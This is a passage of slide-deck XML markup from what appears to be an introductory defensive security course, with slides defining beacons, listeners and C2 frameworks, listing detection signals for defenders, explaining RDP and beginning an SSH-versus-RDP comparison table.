              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;308;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1131570"/>
            <a:ext cx="81610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A live reverse shell is a constant, visible connection, easy to spot in traffic. Real intrusions are usually quieter.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Google Shape;309;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1474470"/>
            <a:ext cx="2640330" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3200"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10" name="Google Shape;310;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="164592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11" name="Google Shape;311;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="709460" y="1703870"/>
            <a:ext cx="329869" cy="329869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Google Shape;312;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="2194560"/>
            <a:ext cx="22974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mbria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Beacon / implant</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Google Shape;313;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651510" y="2503170"/>
            <a:ext cx="2297430" cy="6515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Malware that wakes up on a timer, "checks in" with the attacker, pulls instructions, runs them, and goes quiet again.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326130" y="1474470"/>
            <a:ext cx="2640330" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3200"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15" name="Google Shape;315;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497580" y="164592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16" name="Google Shape;316;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3555530" y="1703870"/>
            <a:ext cx="329869" cy="329869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497580" y="2194560"/>
            <a:ext cx="22974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mbria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Listener</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Google Shape;318;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3497580" y="2503170"/>
            <a:ext cx="2297430" cy="6515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attacker's server, waiting for beacons to check in. The other end of the connection.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Google Shape;319;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1474470"/>
            <a:ext cx="2640330" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3200"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0" name="Google Shape;320;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="1645920"/>
            <a:ext cx="445770" cy="44577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21" name="Google Shape;321;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401600" y="1703870"/>
            <a:ext cx="329870" cy="329869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Google Shape;322;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="2194560"/>
            <a:ext cx="229743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mbria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>C2 framework</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;323;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6343650" y="2503170"/>
            <a:ext cx="2297430" cy="6515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Software that manages many beacons across many victims at once. Sliver (open source, by BishopFox) is a real, widely used example; Cobalt Strike is its well-known commercial cousin.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Google Shape;324;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="3394710"/>
            <a:ext cx="8161020" cy="1337310"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 4103"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25" name="Google Shape;325;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3579876"/>
            <a:ext cx="480060" cy="48006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26" name="Google Shape;326;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="748208" y="3642284"/>
            <a:ext cx="355244" cy="355244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303020" y="3531870"/>
            <a:ext cx="71323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What this means for you as a defender</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3840480"/>
            <a:ext cx="774954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You already know a shell has a parent process. A shell whose parent is a web server or a PDF reader is never normal, that's a top detection signal. Watch for outbound connections on a regular timer, and check persistence spots like .bashrc, crontab, and startup services. This is exactly what Security Onion and a real threat-hunting playbook are built to catch.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p24"/>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Beacons &amp; C2</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Google Shape;330;p24"/>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35" name="Shape 335"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;p25"/>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DEFINITION #3</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Google Shape;337;p25"/>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What is RDP?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1405890"/>
            <a:ext cx="8161020" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 4000"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39" name="Google Shape;339;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1611630"/>
            <a:ext cx="582930" cy="58293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40" name="Google Shape;340;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="761581" y="1687411"/>
            <a:ext cx="431369" cy="431369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Google Shape;341;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1405890" y="1577340"/>
            <a:ext cx="7063740" cy="102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libri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Remote Desktop Protocol (RDP): Microsoft's protocol for remotely controlling a full graphical desktop, as if you were sitting at that machine's keyboard, mouse, and monitor.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Google Shape;342;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="2983230"/>
            <a:ext cx="2606040" cy="1748790"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3137"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3" name="Google Shape;343;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508760" y="3188970"/>
            <a:ext cx="548640" cy="54864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44" name="Google Shape;344;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1580084" y="3260293"/>
            <a:ext cx="405994" cy="405994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Google Shape;345;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582930" y="3874770"/>
            <a:ext cx="24003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Port 3389</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Google Shape;346;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="4183380"/>
            <a:ext cx="233172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default port RDP listens on.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3257550" y="2983230"/>
            <a:ext cx="2606040" cy="1748790"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3137"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8" name="Google Shape;348;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286250" y="3188970"/>
            <a:ext cx="548640" cy="54864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49" name="Google Shape;349;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4357574" y="3260293"/>
            <a:ext cx="405994" cy="405994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Google Shape;350;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360420" y="3874770"/>
            <a:ext cx="24003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A full desktop</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Google Shape;351;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394710" y="4183380"/>
            <a:ext cx="233172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You get windows, a mouse cursor, the works, not just text.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6035040" y="2983230"/>
            <a:ext cx="2606040" cy="1748790"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3137"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3" name="Google Shape;353;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063740" y="3188970"/>
            <a:ext cx="548640" cy="54864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354" name="Google Shape;354;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7135063" y="3260293"/>
            <a:ext cx="405994" cy="405994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6137910" y="3874770"/>
            <a:ext cx="240030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Windows-native</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Google Shape;356;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="4183380"/>
            <a:ext cx="233172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Built into Windows; Linux/macOS need an RDP client to connect out.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Google Shape;357;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="4800600"/>
            <a:ext cx="81610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1" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="6B6560"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>A shell can still exist inside an RDP session, it just lives in a console window inside that graphical desktop.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Google Shape;358;p25"/>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What is RDP?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="359" name="Google Shape;359;p25"/>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64" name="Shape 364"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;p26"/>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SIDE BY SIDE</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="Google Shape;366;p26"/>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SSH vs. RDP, at a glance</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="367" name="Google Shape;367;p26"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="480060" y="1440180"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{478180C5-CB36-4EF2-B2AC-066172CEEAD5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1851650"/>
                <a:gridCol w="3154675"/>
                <a:gridCol w="3154675"/>
              </a:tblGrid>
              <a:tr h="514350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="900"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
